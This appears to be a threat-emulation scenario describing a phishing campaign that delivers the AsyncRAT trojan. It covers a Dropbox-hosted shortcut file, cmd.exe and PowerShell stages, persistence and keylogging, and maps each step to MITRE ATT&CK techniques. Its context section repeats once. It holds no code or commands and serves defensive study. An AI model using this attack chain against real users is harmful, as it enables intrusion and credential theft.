Context:
This scenario describes a multi-stage phishing campaign delivering AsyncRAT, a remote access trojan, through the abuse of legitimate cloud services and script-based execution techniques.
The attack begins with phishing emails containing links to externally hosted resources, typically on trusted platforms such as Dropbox. Victims are tricked into downloading and executing a malicious shortcut (.url) file, which initiates a sequence of command-line and scripting activity involving cmd.exe and PowerShell.
The campaign leverages living-off-the-land techniques and legitimate infrastructure, such as cloud hosting and proxy services, to evade detection. Once executed, AsyncRAT enables remote control, credential harvesting, and data exfiltration through communication with attacker-controlled command-and-control servers.
Mitre ATT&CK Mapping
| Tactic |
Technique ID |
Technique Name |
Context |
| Initial Access |
T1566 |
Phishing |
The victim receives a phishing email containing a link to a malicious file hosted on a cloud service. |
| Command and Control |
T1102 |
Web Service |
The attacker uses legitimate cloud services (e.g., Dropbox) to host and deliver malicious files. |
| Execution |
T1204 |
User Execution |
The victim executes a malicious shortcut (.url) file, initiating the attack chain. |
| Execution |
T1059.003 |
Command and Scripting Interpreter: Windows Command Shell |
The shortcut file invokes cmd.exe to start command-line execution. |
| Execution |
T1059.001 |
Command and Scripting Interpreter: PowerShell |
PowerShell is used to execute scripts and retrieve additional payload components. |
| Command and Control |
T1105 |
Ingress Tool Transfer |
The AsyncRAT payload is downloaded from remote attacker-controlled infrastructure. |
| Defense Evasion |
T1027 |
Obfuscated Files or Information |
Scripts and commands are obfuscated to evade detection. |
| Persistence |
T1547 |
Boot or Logon Autostart Execution |
The malware establishes persistence using system startup mechanisms. |
| Credential Access |
T1056 |
Input Capture |
AsyncRAT captures user input and collects credentials through keylogging. |
| Command and Control |
T1071 |
Application Layer Protocol |
The compromised system communicates with attacker-controlled infrastructure over web protocols. |
References
Analyzing a Multi-Stage AsyncRAT Campaign via Managed Detection and Response - https://www.trendmicro.com/en_us/research/26/a/analyzing-a-a-multi-stage-asyncrat-campaign-via-mdr.html
Context:
This scenario describes a multi-stage phishing campaign delivering AsyncRAT, a remote access trojan, through the abuse of legitimate cloud services and script-based execution techniques.
The attack begins with phishing emails containing links to externally hosted resources, typically on trusted platforms such as Dropbox. Victims are tricked into downloading and executing a malicious shortcut (.url) file, which initiates a sequence of command-line and scripting activity involving cmd.exe and PowerShell.
The campaign leverages living-off-the-land techniques and legitimate infrastructure, such as cloud hosting and proxy services, to evade detection. Once executed, AsyncRAT enables remote control, credential harvesting, and data exfiltration through communication with attacker-controlled command-and-control servers.
Mitre ATT&CK Mapping
References
Analyzing a Multi-Stage AsyncRAT Campaign via Managed Detection and Response - https://www.trendmicro.com/en_us/research/26/a/analyzing-a-a-multi-stage-asyncrat-campaign-via-mdr.html